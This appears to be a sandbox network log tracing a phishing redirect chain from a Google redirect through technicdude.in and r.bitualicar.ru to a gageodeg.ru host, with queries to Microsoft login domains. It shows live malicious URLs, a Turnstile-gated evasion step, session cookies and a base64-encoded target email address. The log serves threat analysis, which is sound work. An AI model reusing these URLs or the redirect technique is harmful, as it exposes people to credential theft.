Source: global trafficHTTP traffic detected: GET /url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ== HTTP/1.1Host: www.google.com.vnConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ== HTTP/1.1Host: www.google.com.vnConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=QvSesO_zUi01XkiyDnHzQ7KtZeFdNbo0Ds35vXbH1YT0F7KVmNVyxbd8EHpuNahsNXOWWrpYGK-DbuH1pDWxZzs0tM_rOhPxIZTicbBQn8x6nHj7HXmEVUzxHLaKP-xGSWmB0K3FIxW6HYUexT0rsNTQwGlwl3e04dui19NdbAXL1TDu1KFFSgetiADh_FHu0qcIkO3Wzd0Pmw
Source: global trafficHTTP traffic detected: GET /opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ== HTTP/1.1Host: technicdude.inConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /2Q5WxE/ HTTP/1.1Host: r.bitualicar.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://technicdude.in/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: technicdude.inConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://r.bitualicar.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://r.bitualicar.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://r.bitualicar.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://r.bitualicar.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://r.bitualicar.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90291484da19c332&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: r.bitualicar.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://r.bitualicar.ru/2Q5WxE/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjJETXVOdGllbHAvSUxGeEZqb1lPOWc9PSIsInZhbHVlIjoiTE50V2ZLNzl4a2xZR1dCUGpyVld6TzhyVWtjYmxrNzg3dTNjVklJeG94YWoxZzZvdEFHbUFQMm5jd1B1ZXcrbmthL09tZERsUjZPU3h0TjZCSTlGT2o1TW13RTNtcmZJUS9tM3U0VVh5OEpjb0p3MVppT1NIWkVJeGFteklDOWgiLCJtYWMiOiI4YzAwNDE5MTVjMWVjMTJmOTE3YWNiMjBhMTBkNTJmNTNkODEyZDEzODgyMWE2OTU5NDVmZDYxYWFmYjAxZDNjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InVOUG53ZXBQRnYvU0Y0dVFOM1gwcXc9PSIsInZhbHVlIjoiYTcxYXpqdm9nMmRyT2RSNTFIMHlpWTgvbEw1a20xRTh4M2xFSGlaL09kUXdWRFJzc09DTnA1a2JQY1lYTkJ4YjUrcTZvVzVqT3NtS2RROEsrZTRGTVZ4NVMwMUcxdlJ6dms0SGtqQ2s1K3lwMUNsS21mK05TVi9xVUQwUnZuSi8iLCJtYWMiOiIyYTUyMGRmMGM2ODQyNzYxNWU0YTNhODZmNjFmYmQ5OThiYjI0MzA1NDYwMjA0YWFjMDk3NTc2NzhhZTBlMzk3IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90291484da19c332&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/587605322:1736976641:hzSxMwNdKMvcs0n6J28XPhW8UvVhUfeqYsOGCs5a83Y/90291484da19c332/_SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/90291484da19c332/1736977815027/e9acd9776db8af061e63561248b6ab76ea6837c01ef68085ad9c2eeed95e0306/2q1Yjtdn1go6iXd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/90291484da19c332/1736977815028/06i_wUjDLHdc2b4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/90291484da19c332/1736977815028/06i_wUjDLHdc2b4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/587605322:1736976641:hzSxMwNdKMvcs0n6J28XPhW8UvVhUfeqYsOGCs5a83Y/90291484da19c332/_SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/587605322:1736976641:hzSxMwNdKMvcs0n6J28XPhW8UvVhUfeqYsOGCs5a83Y/90291484da19c332/_SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /CFFosVVTLJhqYwRVAfbJpWevuDzUvXPUVQLIAETXJPRCVHPCKZOSKOZDRZWARFMODJEGAE HTTP/1.1Host: fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://r.bitualicar.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://r.bitualicar.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /CFFosVVTLJhqYwRVAfbJpWevuDzUvXPUVQLIAETXJPRCVHPCKZOSKOZDRZWARFMODJEGAE HTTP/1.1Host: fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: google.com.vn
Source: global trafficDNS traffic detected: DNS query: www.google.com.vn
Source: global trafficDNS traffic detected: DNS query: technicdude.in
Source: global trafficDNS traffic detected: DNS query: r.bitualicar.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/587605322:1736976641:hzSxMwNdKMvcs0n6J28XPhW8UvVhUfeqYsOGCs5a83Y/90291484da19c332/_SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3209sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: _SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uTsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 21:50:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 21:50:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVdO1wjIvtScIyPqcAdcVd9vYWRCll2pZWUyzKb8JzQ7RJd0m%2Fe4SC4lLYJAf96ojd0utNG6LYsmArISY6fonxozflMfIvLZADtb9vIBWcJIBNqTaFHpVUX%2FsDnyeA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5027&min_rtt=4984&rtt_var=1481&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2100&delivery_rate=545384&cwnd=239&unsent_bytes=0&cid=dedc56eef0add386&ts=196&x=0"CF-Cache-Status: HITAge: 8784Server: cloudflareCF-RAY: 9029148c0e3fabfd-YYZserver-timing: cfL4;desc="?proto=TCP&rtt=13888&min_rtt=13872&rtt_var=5234&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1894&delivery_rate=208526&cwnd=32&unsent_bytes=0&cid=dc1ccad5b9cb667a&ts=4206&x=0"
Source: chromecache_98.2.dr, chromecache_89.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_98.2.dr, chromecache_89.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61312
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
